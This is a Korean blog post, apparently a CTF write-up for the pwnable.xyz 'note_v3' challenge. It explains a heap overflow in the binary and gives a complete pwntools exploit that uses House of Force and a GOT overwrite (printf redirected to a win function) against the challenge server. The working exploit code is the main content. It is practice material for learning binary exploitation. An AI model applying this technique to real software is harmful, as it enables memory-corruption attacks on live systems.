note를 생성, 수정, 출력 기능이 존재한다
free가 불가능하고 heap overflow를 터트릴 수 있어서 house of force를 통해 note에 청크를 생성해 got주소를 적어두고 note edit를 통해 got overwrite했다
from pwn import *
#context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30041)
#p = process("./note_v3", env = {"LD_PRELOAD" : "./alpine-libc-2.24.so"})
#gdb.attach(p)
def make(size, title, note = 0):
p.recvuntil(b"> ")
p.sendline(b"1")
p.recvuntil(b"Size: ")
p.sendline(str(size))
p.recvuntil(b"Title: ")
p.send(title)
if note != 0:
p.recvuntil(b"Note: ")
p.send(note)
def edit(idx, data = 0):
p.recvuntil(b"> ")
p.sendline(b"2")
p.recvuntil(b"Note: ")
p.sendline(str(idx))
if data != 0:
p.recvuntil(b"Data: ")
p.send(data)
def list_note():
p.recvuntil(b"> ")
p.sendline(b"3")
win = 0x4008a2
note = 0x6012A0
puts = 0x601210
make(-1, b"AAAA")
make(0, b"AAAA")
payload = b"A" * 0x47
payload += B"B"
edit(0, payload)
list_note()
p.recvuntil(b"B")
heap = p.recv(4)
heap += b"\x00" * 4
top_chunk = u64(heap) + 0x70
log.info("top chunk addr: " + hex(top_chunk))
make(-1, b"AAAA")
payload = b"A" * 0x88
payload += p64(0xffffffffffffffff)
edit (1, payload)
target_chunk = (note + 0x20) - 0x30 - top_chunk
make(target_chunk, p64(0x00000000601228 - 0x10))
edit(4, p64(win))
p.interactive()
처음에는 puts got를 덮었는데 계속 segfault가 나서 이것저것 해보다 printf로 했다
'pwn > pwnable.xyz' 카테고리의 다른 글
| [pwnable.xyz] AdultVM3 (0) | 2024.05.20 |
|---|---|
| pwnable.xyz / world (0) | 2022.05.28 |
| pwnable.xyz / door (0) | 2022.05.27 |
| pwnable.xyz / child (0) | 2022.05.27 |
| pwnable.xyz / Car shop (0) | 2022.05.26 |
